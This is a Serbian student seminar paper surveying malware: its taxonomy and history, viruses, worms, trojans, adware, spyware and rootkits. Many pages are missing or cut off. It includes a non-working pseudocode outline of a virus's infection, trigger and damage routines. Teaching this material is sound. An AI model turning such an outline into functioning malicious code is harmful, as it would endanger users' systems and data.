Professional Documents
Culture Documents
Zlonamerni Programi - Goran Panić
Zlonamerni Programi - Goran Panić
Zlonamerni Programi - Goran Panić
Zlonamerni programi
- SEMINARSKI RAD -
Strana|2
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
SADRŢAJ
1. UVOD ..................................................................................................................... 5
1.1 Kriptografija....................................................................................................... 5
1.2 Aplikacije mreţne bezbednosti ......................................................................... 6
1.3 Sistemska bezbednost ...................................................................................... 8
2. ZLONAMERNI PROGRAMI ................................................................................. 10
2.1 Podela zlonamernih programa ........................................................................ 10
2.2 Istorijat ............................................................................................................ 12
3. VIRUSI ................................................................................................................. 17
3.1 DOS i Windows virusi ..................................................................................... 19
3.2 Linux virusi ...................................................................................................... 21
3.3 Makro virusi .................................................................................................... 22
3.4 Skript virusi ..................................................................................................... 23
3.5 Destruktivnost virusa ...................................................................................... 23
4. CRVI..................................................................................................................... 25
4.1 Poznati crvi ..................................................................................................... 26
5. TROJANSKI KONJI.............................................................................................. 29
5.1 Login ............................................................................................................... 30
5.2 Backdoor ........................................................................................................ 31
5.3 Joke ................................................................................................................ 31
5.4 NetBus alatka ................................................................................................. 32
6. PROBLEMATIČNE KOMPONENTE .................................................................... 34
6.1 Java skript....................................................................................................... 34
6.2 ActiveX kontrole .............................................................................................. 35
6.3 VB skript ......................................................................................................... 35
7. PARAZITSKI PROGRAMI .................................................................................... 37
7.1 Adware ........................................................................................................... 37
7.2 Spyware .......................................................................................................... 37
7.3 Tajne mreţe .................................................................................................... 38
7.4 Detekcija i uklanjanje parazitskih programa .................................................... 39
8. ROOTKIT ............................................................................................................. 40
8.1 Podela rootkit alata ......................................................................................... 40
8.2 Linux ............................................................................................................... 41
Strana|3
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Strana|4
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
1. UVOD
Kolekciju alata dizajniranu da zaštiti podatke na računaru i spreči napade
hakera nazivamo alatima za računarsku bezbednost (engl. Computer security).
Zaštita podataka tokom prenosa putem mreţe predstavlja mreţnu bezbednost (engl.
Network security). Ne moţe se povući jasna granica izmeĎu ove dve forme zaštite.
OSI arhitektura predstavlja način u organizovanju pruţanja bezbednosti.
Fokusira se na bezbednost od napada, bezbednosne mehanizme i bezbednosne
servise.
Bilo kakva radnja koja ima za cilj da ugrozi bezbednost tuĎih informacija
predstavlja bezbednosni napad (engl. Security Attacks). Bezbednosni napadi se
mogu podeliti na:
Pasivne napade – analiziranje saobraćaja
Aktivne napade – aktivno menjanje sadrţine podataka koji se prate
Radi povećanja sigurnosti obrade podataka i prenosa informacija u nekom
sistemu, koristi se usluga bezbednosnih servisa (engl. Security service). Ona treba
da obezbedi odgovor na bezbednosni napad i iskoristi bezbednosne mehanizme
(mehanizmi dizainirani za otkrivanje, prevenciju ili oporavak od sigurnosnog napada)
u cilju odbrane.
Knjiga (Stallings, 2007) se bavi problemom mreţne bezbednosti. Celokupna
mreţna (internet) bezbednost se u knjizi deli na tri oblasti:
Kriptografija – kriptovanje, ključevi, autentifikacija poruka …
Aplikacije mreţne zaštite – aplikacije za autentifikaciju, e-mail
bazbednost, IP bezbednost , Web bezbednost, upravljanje mreţnom
besbednosti ...
Sistemska zaštita – upadi, maliciozni programi, firewall ...
1.1 Kriptografija
U slučaju prenosa poverljive poruke na udaljenu lokaciju, korisnik i primalac
ne mogu biti sasvim sigurni da poruka pri prenosu neće biti čitana ili njen sadrţaj
menjan. Jedino što preostaje u ovom slučaju je pokušaj zaštite poruke, kako bi bila
napadaču nečitljiva tokom njenog prenosa.
Kriptografija je tehnika koja se koristi u cilju obezbeĎivanja tajnosti poruka.
Kriptografski algoritam predstavlja skup dve matematičke funkcije: funkcije
šifrovanja i funkcije dešifrovanja.
Pošiljalac kriptuje poruku uz pomoć algoritma za kriptovanje i ključa, a tako
kriptovana poruka se prenosi preko mreţe, sve do primaoca. Primalac koristi
algoritam za dekriptovanje poruke i svoj ključ, da bi poruku dekriptovao i time doveo
u stanje pre kriptovanja. Ukoliko neko presretne poruku koja se šalje, neće biti u
mogućnosti da pročita njen sadrţaj, pošto je šifrovan.
Strana|5
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Strana|7
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Strana|8
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Strana|9
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
2. ZLONAMERNI PROGRAMI
Područje računarske sigurnosti koje se bavi zlonamernim programima često
u medijima stvara veliku paţnju. Obaveštenja koja se prosleĎuju na taj način, a
govore o zlonamernim programima su neretko preuveličana i netačna. U ovom
poglavlju radi boljeg razumevanja ovakvih programa definisane su različite kategorije
zlonamernog softvera sa njihovim karakteristikama i mogućnostima zaštite od istih.
U zlonameran program (engl. malware, malicious software) ubraja se svaki
program napravljen u nameri da na bilo koji način ošteti računar ili oteţa
(onemogući) njegovo korišćenje.
Štetu koju zlonamerni programi mogu izazivati na nekom sistemu delimo u tri
osnovne kategorije:
Namerna šteta uzrokovana izvršenjem destruktivnog dela koda samog
programa. Ova šteta ne postoji uvek (dobroćudni virusi), a kada postoji
svodi se na brisanje ili izmenu podataka u sistemu, a neretko i na fizička
oštećenja sistema (prepisivanje BIOS-a).
Slučajna šteta, koja nastaje pri pokušaju instalacije zlonamernog
programa ili njegovog skrivanja u sistemu. Najčešće dovodi do uništenja
podataka na računaru usled loše napisanog koda takvog programa.
Propratna šteta, koja je uzrokovana delovanjem virusa ili crva, a
manifestuje se gubitkom memorijskog prostora ili zagušenjem veze i
servisa. U ovaj tip štete spada i šteta od otkrivanja poverljivih informacija,
a koju najčešće izazivaju trojanski konji i špijunski programi.
S t r a n a | 10
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
KLOPKE
LOGIČKE
BOMBE ROOTKIT
ZLONAMERNI
POTREBAN PROGRAMI
NOSILAC
SAMOSTALNI
TROJANSKI
KONJI
VIRUSI
ŠPIJUNSKI
CRVI
REPLICIRAJU SE PROGRAMI
Virus [1] je program koji moţe inficirati druge programe, tako što u njih
ubacuje svoju kopiju, koja ih inficira i u stanju je da se dalje širi. Pod infekcijom se u
računarskoj terminologiji smatra promena toka pokrenutog programa. Bitno je
napomenuti da virusi ne moraju uvek da deluju destruktivno, već samo kada su tako
programirani. Osnovna osobina virusa, njihovo repliciranje, omogućava da se oni
brzo šire i teško uklanjaju iz zaraţenog sistema i predstavljaju najopasniju vrstu
zlonamernih programa.
Većina malicioznih programa sa kojima se danas korisnik računara susreće
predstavljaju uglavnom crve [2]. Crvi predstavljaju zlonamerne programe koji imaju
mogućnost širenja (repliciranja) na druge računare unutar mreţe, a da se pri tom ne
infiltriraju u druge programe. Crv se moţe definisati kao virus koji ne poseduje
parazitske osobine, već se samostalno replicira.
Trojanske konje [3] vrlo je jednostavno razlikovati od virusa i crva, oni se ne
repliciranju sami već je potrebna eksplicitna akcija korisnika. Obično se distribuiraju
kao deo nekog programa, za koji korisnik ne zna da postoji, a često se mogu pronaći
i kao dodatak elektronskoj pošti. Najčešće aktivnosti trojanaca su brisanje podataka i
kraĎa poverljivih informacija od korisnika.
S t r a n a | 11
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Logička bomba [4] (engl. logical bomb) je zlonameran kod ugraĎen u neki
koristan program koji će se aktivirati kada se ispune odgovarajući uslovi (recimo u
odreĎeno vreme - vremenska bomba). Prenosi se kao deo trojanskog konja ili se
moţe ubaciti kao deo programa. Mogućnosti su praktično neograničene i zavise
samo od mašte autora koda.
Zombi (engl. zombie) je program koji potajno preuzima kontrolu nad drugim
umreţenim računarom. Nakon toga ga koristi da indirektno lansira napad. Često se
koriste za lansiranje distribuiranog napad odbijanjem usluga [5] (engl. distributed
denial of service – DDoS attacks). Njegova infiltracija u sistem se najčešće
zasniva na korišćenju poznatih propusta u mreţnim sistemima.
Klopka (engl. trap door). Autor programa moţe slučajno ili namerno ostaviti
prazna mesta u svom kodu (klopku). Uljez koji zna za ta mesta moţe da podmetne
svoj kod i time ostvari neku dobit. Osim toga, autor programa moţe izmeniti deo
koda tako da se izmena ne moţe jednostavno primetiti. Na primer, zaokruţivanje
iznosa transakcije na neku celobrojnu vrednost u odreĎenim trenucima, predstavlja
klopku ukoliko se ostatak zaokruţivanja prenosi na račun programera. Klopke se
teško otkrivaju, jer treba analizirati celokupan kod sumnjivog programa.
Špijunski programi [6] (engl. spyware) je neţeljeni program, instaliran na
računaru bez znanja ili odobrenja korisnika, koji prikuplja informacije o aktivnostima
korisnika, lozinkama, poverljivim podacima, finansijskim transakcijama... U špijunske
programe mogu se ubrojati i trojanski konji iz kategorije kradljivaca informacija (npr.
keylogger).
Reklamni špijunski programi [7] (engl. adware) informacije prikupljaju i šalju
kompanijama koje se bave posebnom vrstom marketinga zasnovanom na praćenju
vaših navika pri pretraţivanju Web-a i na oglašavanju (engl. behavioural marketing).
Rootkit [8] predstavlja komplet alata koji omogućavaju napadaču da odrţava
pristup sistemu. Napadač na ovaj način stiče pravo daljinskog upravljanja tuĎim
računarom, a da legitimni korisnik toga nije ni svestan.
2.2 Istorijat
Prvi programi koji su imali za cilj da nanesu neku štetu, dosta se razlikuju od
današnjih programa takve namene.
Virus Brain [9] bio je prvi zlonamerni program, koji je uspeo da se raširi i
inficira računare. Pojavio se 1986. godine i predstavlja najstariji poznati PC virus. U
to vreme jedini medij koji su virusi mogli da zaraze bila je disketa, pošto tvrdi diskovi
nisu bili dostupni prosečnim korisnicima. Brain je u boot sektoru (sektor koji se
učitava prvi pri podizanju računara i predstavlja idealno mesto za postavljanje virusa)
upisivao sebe samog dok je izvršni sadrţaj premeštan na prazan prostor diskete. Taj
prostor je zatim proglašavan neispravnim, da bi se sprečilo prepisivanje od stane
operativnog sistema i time omogućilo dalje širenje virusa…
S t r a n a | 12
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Ovaj virus nije nanosio nikakvu štetu, ako izuzmemo zauzimanje memorijskog
prostora na disketi, već se samo širio. Zanimljiva činjenica vezana za Brain virus je
da se u njegovom telu mogla pronaći potpuna adresa kreatora koda.
Welcome to the Dungeon © 1986 Basit * Amjad (pvt) Ltd. BRAIN COMPUTER
SERVICES 730 NIZAM BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE:
430791,443248,280530. Beware of this VIRUS.... Contact us for
vaccination..
Pojava Brain virusa dovodi do pojave prve grupe virusa nazvane Boot-sector
infector (BSI) virusi. BSI virusi su svi virusi koji zamenjuju izvorni sadrţaj boot
sektora na disketi ili tvrdom disku u zavisnosti od tipa virusa.
Najpoznatiji predstavnik ove grupe virusa je Stoned virus [10], koji se pojavio
1990. godine, a radio je na sličnom principu kao Brain virus. Virus je bio dizajniran
bez štetne nosive komponente, a računar zaraţen ovim virusom povremeno je
ispisivao poruku:
Iste godine otkriven je Cascade virus [11], prvi virus koji je upotrebljavao
enkripciju kao jednostavan oblik polimorfizma. Polimorfizam predstavlja sposobnost
zlonamernog programa da promeni izgled izvršnog koda, najčešće enkripcijom ili
S t r a n a | 13
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 14
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 15
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Pored svih ovih problema sa kojima se sreće običan korisnik računara, a koji
mogu biti manje ili više opasni, pojavile su se i laţne uzbune. Hoax [18] poruka
predstavlja laţno upozorenje, često o nepostojećem problemu. Poruka od primaoca
zahteva da pošalje upozorenje na što više adresa. Good Times hoax je predstavnik
ove grupe zlonamernih poruka, a prvi put je lansiran u novembru 1994. godine.
Da zlonamerni programi mogu biti jako destruktivni, pa čak uništavati i
hardver, svedoči primer CIH virusa [19]. Ovaj virus otkriven je 1998. na Taivanu.
Pored toga što uništava sve podatke sa tvrdog diska, on pokušava da upiše nove u
fleš memoriju (engl. flash memory) BIOS-a ploče. Na taj način se računar trajno
oštećuje i jedini način popravke je upisivanje ispravnih podataka u EEPROM, što je
na pločama sa integrisanim čipom neisplativo.
Kombinacija crva is skript jezika je 2003. godine izrodila jedan u nizu
zlonamernih programa sa imenom SQLSlammer [20], koji je uzrokovao zagušenje
Interneta. Ovaj program pripada DoS [5] (engl. Denial of Servise) programima. DoS
programi izazivaju napad na krajnjeg korisnika uskraćivanjem računarskih resursa
raznim metodama. Obično ovakav napad izaziva onemogućavanje korisnika da
pristupi pojedinim resursima, kao na primer nekom web servisu.
S t r a n a | 16
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
3. VIRUSI
Virusi (engl. viruses) su verovatno najpoznatija vrsta od svog raspoloţivog
zlonamernog programa. Pojam virus u rečnik računarske terminologije uvrstio je
1983. godine profesor Frederick B. Cohen [21], sa univerziteta Juţne Kalifornije.
On je, u svojoj doktorskoj tezi 1984. godine, postavio prvu opštu definiciju
virusa: ˝Definišemo kompjuterski virus kao program koji inficira ostale
programe modifikujući ih tako da uključuju njegovu naprednu kopiju. Sa
inficiranog područja, virus se može širiti kroz kompjuterski sistem i mrežu
koristeći autorizaciju svakog korisnika, da inficira njihove programe. Svaki
program koji se inficira se takođe ponaša kao virus, i stoga, infekcija raste˝.
Pod infekcijom se kod računarskih virusa smatra promena toka programa,
koji je pokrenut. Treba zapaziti da definicija Cohen-a ne govori o destruktivnom
dejstvu virusa, koji predstavlja osnovnu asocijaciju na reč virus. Česti efekti infekcije
virusima su brisanje vaţnih datoteka, menjanje njihovog sadrţaja ili dovoĎenje
sistema u stanje u kome ne moţe normalno da funkcioniše. Efekti fizičkog uništenja
hardvera su veoma retki, ali istorija virusa beleţi i takve slučajeve (primer CIH virus).
Virusi ne koriste mreţne resurse za širenje, poput crva, ali se mogu širiti preko
mreţe kao deo nekog crva. Kao i svi drugi programi koji se sami šire, virusi u svom
širenju koriste sasvim legitimne funkcije, poput običnih programa, što oteţava
njihovo detektovanje.
Iako slični, virusi poseduju odreĎene specifičnosti, te se tako mogu podeliti u
nekoliko grupa. Najčešća klasifikacija virusa vrši se na osnovu načina napadanja i
veštini skrivanja koju primenjuju. Tako razlikujemo:
Parazitski virusi (engl. parasitic virus) – ponašaju se poput parazita,
koriste izvršne datoteke za infiltraciju
Memorijski virusi (engl. memory - resident virus) – nalaze se u
operativnoj memoriji, odakle inficiraju ostale datoteke
Boot sektor virusi (engl. boot sector virus) – nalaze se u boot sektorima
diskova
Nevidljivi virusi (engl. stealth) – koriste metode prikrivanja
Polimorfni (engl. polymorphic virus) – poseduju polimorfne osobine za
promenu svog izgleda
Makro virusi (engl. macro virus) – kreiraju se na osnovu makro jezika,
inficiraju dokumente programskih paketa u kojima su kreirani.
S t r a n a | 17
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
// Infekcijska komponeta
private void Infect(){
do {
file = "Iraberi bilo koji izvršni fajl";
}
while ("Fajl je inficiran" == True)
UbaciVirus(file); //Inficiranje fajla
}
// Nosiva komponenta
private void Damage(){
"Zlomameran kod"
}
// Funkcija za okidanje
private bool Trigger() {
if ("Ispunjeni uslovi okidanja") return true;
return false;
}
public Virus(){
Infect();
if (Trigger()){
Damage();
}
else{
"Kod koji program inače izvršava"
}
}
}
S t r a n a | 18
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 19
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 20
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 21
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 22
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 23
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 24
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
4. CRVI
Crv [2] (engl. worm) predstavlja samostalni (engl. stand-alone) program, ili
skup programa, koji se šire s jednog računara na drugi. Upravo osobina
samostalnosti je ono što ih razlikuje od virusa, jer za njihovo prenošenje nije
potrebna nikakva datoteka.
Internet, kao najveća globalna mreţa, predstavlja optimalan medij za širenje
crva. Uobičajene metode prenošenja na ţrtvu jesu upotreba elektronske pošte i
Internet servisa (FTP, HTTP).
Razlikujemo dve vrste crva:
Crvi na računaru domaćina (engl. Host computer worms)
Mreţni crvi
Crvi na računaru domaćina nalaze se na računaru na kome su pokrenuti, a
mreţnu komunikaciju upotrebljavaju samo za širenje.
Mreţni crvi se sastoje od višestrukih delova, od kojih je svaki pokrenut na
drugom računaru u mreţi. Mreţa se upotrebljava za komunikaciju meĎu delovima.
Ukoliko mreţni crv poseduje glavni deo koji upravlja radom drugih delova crva, tada
ga nazivamo hobotnicom (engl. Octopus).
Širenje crva se moţe klasifikovati prema transportnom mehanizmu i načinu
pokretanja.
Podela crva prema transportnom mehanizmu:
Prenos putem elektronske pošte (engl. e-mail worms)
Prenos putem instant poruka (engl. IM worms)
Prenos putem Interneta (FTP i HTTP protokola)
Prenos putem deljenja datoteka (engl. file-sharing)
Prenos putem razmene datoteka izmeĎu ravnopravnih računara (P2P crvi)
Podela crva prema načinu pokretanja:
Crvi koji se sami pokreću
Crvi koje pokreću korisnici - koristi ranjivost ţrtve ili koristi metode prevare i
obmanjivanja, poznate kao društveni inţenjering (engl. social engineering),
kako bi naterao korisnika da ga pokrene.
Hibridni crvi – koriste kombinaciju samostalnog pokretanja i pokretanja od
strane korisnika
Crvi koji se šalju putem elektronske pošte, vrlo brzo se mogu raširiti, najčešće
u toku jednog dana. Iz tog razloga ovi crvi predstavljaju najrasprostranjeniji metod
transporta. E-mail crvi koriste e-mail klijente (npr. Microsoft Office Outlook) na
korisnikovom računaru, da bi došli do liste adresa. U slučaju da ih pronaĎe, šalje
inficirane poruke na adrese koje je pronašao. Postoje i crvi koji koriste mnogo
sofisticiranije vrste pribavljanja e-mail adresa, poput pretrage istorijata web stranica
internet pretraţivača, koje neretko sadrţe e-mail adrese.
S t r a n a | 25
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 26
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
ILoveYou ili LoveLetter [27] je jedan od VBS crva koji se brzo raširio. Pojavio
se 2000. godine i uspeo je da zarazi na desetine miliona računara pod Windows
operativnim sistemom.
Glavnu ulogu u brzom širenju ovog crva, kao kod mnogih koji će se javljati
kasnije, odigrala je takozvana “komponenta socijalnog inţenjeringa”. Crv je dolazio u
prilogu elektronske pošte, koja je bila Visual Basic Script datoteka pod imenom
LOVE-LETTER-FOR-YOU.TXT.vbs, a sama pošta bila je naslovljena sa “I Love
You”. Dvostruka ekstenzija omogućila je prekrivanje prave funkcionalnosti priloga
elektronske pošte (Windows naravno detektuje samo poslednju ekstenziju, u ovom
slučaju vbs).
Crv bi pri upadu na računar menjao Registry bazu kako bi omogućio svoje
pokretanje pri podizanju računara. Nakon toga pokušavao bi da inficira datoteke tipa
VBS,VBE, JS, JSE, CSS, WSH, JPG, JPEG, MP2 i MP3.
Nakon uspešne infekcije računara crv bi na više načina pokušavao da se
proširi: pristupao Outlook-u i slao poštu (koja bi sadrţala njegovu kopiju) na sve
dostupne adrese, pokušavao prenos putem IRC-a, pokušavao skinuti trojanske
konje zadavanjem početne stranice u Internet Explorer-u...
Anna Kournikova [28] je sledeći crv zasnovan na socijalnom inţenjeringu i
predstavlja enkriptovani crv napisan u Visual Basic-u, koji se širio upotrebom
Microsoft Outlook aplikacije. Samo telo se nalazilo u datoteci koja je dolazila uz
poruku, a nosila je naslov AnnaKournikova.jpg.vbs. Godine 2001. ovaj crv se za
samo nekoliko sati raširio po celom svetu. Najgore u svemu ovome je da je crv Anna
Kournikova kreiran upotrebom alata za generisanje virusa.
S t r a n a | 27
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 28
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
5. TROJANSKI KONJI
Trojanski konji [3] (engl. Trojan horses) ili kraće trojanci, su programi koji se
maskiraju i reklamiraju kao korisni programi, sa namerom da ubede (prevare)
korisnike da ih pokrenu.
Ono što trojance razlikuje od virusa i crva je nemogućnost replikacije, tačnije
oni se mogu prenositi sa računara na računar samo putem aktivnosti samog
korisnika. To znači da ovaj tip zlonamernih programa ne poseduje infekcijsku
komponentu, tj. funkcije za inficiranje drugih programa.
Trojanski konji koji uspevaju da se infiltriraju u sistem, najčešće će pokušati
da ukradu korisne informacija od korisnika, kao na primer lozinke. TakoĎe, često
korišćena mogućnost trojanaca je takozvani “backdoor” ili omogućavanje
neovlašćenog pristupa i kontrole računara od strane neautorizovanog korisnika, a
da legitimni korisnik toga nije svestan.
Uskršnja jaja [31], [32] (engl. Easter eggs) ili funkcije programa koje su
skrivene i nisu njegova osnovna namena, ne smatraju se trojanskim konjima. Ove
funkcije prave programeri, najčešće radi zabave, i ne poseduju nikakav zlonameran
deo koda.
Slika 5.1 The Word 97 Pinball & Windows 98 credits easter egg – preuzeto iz [32]
S t r a n a | 29
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
5.1 Login
Klasičan primer trojanskog konja je Login trojanski konj, koji simulira izgled
forme za prijavu korisnika. Trojanac blokira pokretanje nekog servisa ili programa, a
umesto njegove forme za logovanje pokreće svoju, koja izgleda identično kao forma
programa preko koje je korisnik ţeleo da se prijavi na sistem. Pošto korisnik nije u
stanju da uoči potencijalnu opasnost, on unosi svoju šifru, koja završava negde u
memoriji trojanca. Trojanski konj potom pokreće pravu aplikaciju i dalje distribuira
unetu lozinku osobi koja ga je postavila. Korisnik koji je ţrtva ovog napada najčešće
nije ni svestan šta se desilo, sve do trenutka kada osoba koja je izvela napad ne
odluči da iskoristi ukradenu šifru.
S t r a n a | 30
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
5.2 Backdoor
Backdoor [34] programi su često upotrebljavana vrsta trojanskih konja, a
omogućavaju udaljenom korisniku da pristupi inficiranom računaru i to tako da
vlasnik računara nije u stanju da uoči “posetioca”.
Grupu takvih programa predstavljaju RAT (engl. Remote Access Tools)
programi, koji omogućavaju potpunu kontrolu nad računarom sa udaljenosti.
Trojanac Back Orifice 2K [35], [36] (BO2K) je karakterističan predstavnik ove grupe
alata. Iako u početku zamišljen kao alat za pomoć administratorima, njegovu osobinu
neovlašćenog pristupa udaljenom računaru ubrzo počinju da upotrebljavaju
zlonamerni korisnici.
Naročito popularne vrste backdoor programa su DoS [5] i DDoS agenti. Ovi
agenti dolaze najčešće kao komponenta nekog backdoor trojanskog konja i
postavljaju se na što veći broj računara. Nakon njihovog sinhronizovanog pokretanja,
od strane osobe koja ih je poslala ili nekog dogaĎaja, slanjem velikog broja zahteva
na adresu nekog servisa, dolazi do njegovog zagušenja (ili zagušenja celokupnog
saobraćaja mreţe).
5.3 Joke
Najbezazlenija grupa trojanskih konja je takozvana „Joke“ grupa. Ovi trojanci
su pisani iz čiste zabave, a namera njihovih autora je da se našale sa ţrtvom.
Programi iz ove grupe ne sadrţe nikakav maliciozni kod, već se uglavnom zasnivaju
S t r a n a | 31
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 32
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Slika 5.4 NetBus i NetBus Pro klijentske aplikacije – preuzeto iz [38] i [39]
S t r a n a | 33
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
6. PROBLEMATIČNE KOMPONENTE
Problematične komponete same po sebi predstavljaju korisne komponente,
koje zlonamerni korisnici koriste da bi zaobišli bezbednosne mehanizme računara.
Neke poznate komponete koje se često upotrebljavaju za izvoĎenje zlonamernih
radnji, biće obraĎene u ovom poglavlju.
S t r a n a | 34
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
6.3 VB skript
Još jedan skript jezik koji se moţe upotrebljavati u html dokumentima je VB
Script [42], [43]. Kreirao ga je Microsoft i zasnovan je na programskom jeziku Visual
Basic. Za razliku od Java skripta, ovaj skript moţe komunicirati sa ActiveX
kontrolama i na taj način iskoristiti eventualne propuste u njima (primer: Kak worm
[44]).
VB skript ne poseduje specijalni sigurnosni model, već su iz njega uklonjene
sve potencijalne opasnosti, kao na primer operacije sa datotekama ili izvršavanje
S t r a n a | 35
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
DLL koda. Sam skript je sveden na pristupanje podacima u html dokumentu, što
uključuje i ActiveX kontrole.
Kako ActiveX kontrole nisu ponekad dobro implementirane, javljaju se
potencijalne rupe u sigurnosti sistema. Problemi ove prirode se uočavaju čak i kod
potpisanih ActivX kontrola. Redovno instaliranje bezbednosnih zakrpa je jedno od
mogućih rešenja ovog problema.
S t r a n a | 36
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
7. PARAZITSKI PROGRAMI
Programi koji se distribuiraju i instaliraju zajedno sa nekom korisnom
aplikacijom, a koji narušavaju privatnost korisnika, troše resurse procesora ili
zauzimaju mesto na disku i sve to bez znanja korisnika, zajedničkim imenom se
nazivaju parazitski programi.
Ovi programi ne nanose nikakvu štetu sistemu, ako izuzmemo trošenje
resursa računara, a njihova aktivnost se najčešće svodi na reklamiranje proizvoda
firme koja ih distribuira. MeĎutim ako se instaliraju na sistem, parazitski programi
dobijaju sva prava poput bilo kog drugog programa, te na taj način mogu
predstavljati potencijalnu opasnost po bezbednost samog sistema.
Postoji nekoliko grupa parazitskih programa: Adware, Spyware i tajne
mreže.
7.1 Adware
Adware [7] spada u najpoznatije parazitske programe. Najčešće se javlja u
obliku JavaScrit koda zaduţenog za prikaz reklama na Internetu.
Osnovna namena takvih programčića, pored reklamiranja, je da prikupljaju
informacije o korisniku, uz pomoć kolačića (engl. Cookie). Tako prikupljene podatke
adware šalje kompaniji koja ga je postavila, na dalju analizu. Kompanije su na ovaj
način u mogućnosti da analiziraju navike korisnika i prilagode reklamu svakom
korisniku (ciljane reklame). Na primer, ukoliko korisnik često posećuje sajtove za
prodaju automobila, na sajtu će se korisniku prikazivati reklame sa tom sadrţinom.
Posebnu podkategoriju adware programa čine aktivni adware programi. Ovaj
adware se nalazi na računaru korisnika, na kome se aktivira i prikazuje raklame kada
se ispune zadati uslovi. Aktivan adware najčešće sadrţi ličnu bazu reklama, koju
osveţava kada se računar poveţe na Internet. Na ovaj način program je u stanju da
prikazuje reklame i kada računar nije na mreţi.
7.2 Spyware
Spyware [6] programi su zaduţeni za tajno nadgledanje aktivnosti korisnika,
na čijem su računaru instalirani.
Da bi došli do podataka o koristiku, spyware programi koriste slične metode
kao adware programi, sa tom razlikom što spyware programi aktivno nadgledaju sve
aktivnosti korisnika i šalju podatke na udaljenu lokaciju.
Ovi programi neretko pregledaju datoteke na korisnikovom računaru u potrazi
za aktivnostima korisnika. Svaki program koji pregleda korisnikov računar ili mreţne
resurse, u potrazi za ličnim podacima korisnika, a bez korisnikove eksplicitne
dozvole, moţemo smatrati spyware programom.
S t r a n a | 37
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 38
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 39
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
8. ROOTKIT
Rootkit [46], [47] predstavlja komplet (engl. kit) koji se sastoji od malih i
korisnih programa koji omogućavaju napadaču da odrţava pristup root-u, korisniku
sa najvećim privilegijama na sistemu. Ovaj komplet je skup programa i koda koji
omogućava permanentno i neprimećeno prisustvo nekom računaru.
Dizajniran je tako da sakrije svoj programski kod i podatke na sistemu. Obično
se koristi za udaljeni pristup ili prisluškivanje (engl. eavesdropping) podataka na
sistemu ili mreţi.
Prvobitno je rootkit bio namenjen za udaljeno administriranje ili slične korisne
operacije, meĎutim njegove pozitivne osobine su brzo zapazili zlonamerni korisnici.
Ukoliko zlonameran korisnik poseduje potrebno znanje iz oblasti kompjuterske
bezbednosti, rootkit alatka u njegovim rukama postaje vrlo opasno oruĎe.
Knjiga (Pleskonjić et al., 2007) na sledeći način obraĎuje oblast rootkit alata.
S t r a n a | 40
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Ovi alati koriste modularnu arhitekturu nekih operativnih sistema, poput Linux-
a, u kome je jezgro sastavljeno od modula. Korisnik sa root privilegijama moţe u
jezgro učitati novi modul (engl. Loadable Kernel Module) i na taj način obezbediti
proširenje funkcionalnosti operativnog sistema.
8.2 Linux
Zbog načina na koji Linux operativni sistem tretira prava pristupa korisnika,
kraĎa informacija sa računara pod ovakvim operativnim sistemom dodatno je
oteţana. Napadači su morali da pronaĎu načine „zavaravanja“ ovih mehanizama
kako bi sakrili svoje prisustvo u sistemu. Iz tih razloga, napadači koriste rootkit alate.
Napad na sistem zasnovan na rootkit alatima izvodi se u četiri faze:
Sakupljanje informacija o sistemu koji se ţeli provaliti, kao na primer: koja
distribucija operativnog sistema je pitanju, koja verzija jezgra, koji
korisnički nalozi postoje ...
Sticanje administratorskih prava, tačnije prava koja ima root korisnik, a
koja su najčešće neophodna za instalaciju;
Ubacivanje i instaliranje rootkit alata;
Uspostavljanje kontrole nad ciljnim sistemom.
S t r a n a | 41
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 42
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 43
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 44
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
S t r a n a | 45
Bezbednost u računarskim mreţama Seminarski rad | Zlonamerni programi
Na kraju korisnik mora da odluči koliko je spreman da plati za sve ovo. Većina
kompanija nudi besplatne (uglavnom ograničene) verzije svojih alata za zaštitu. One
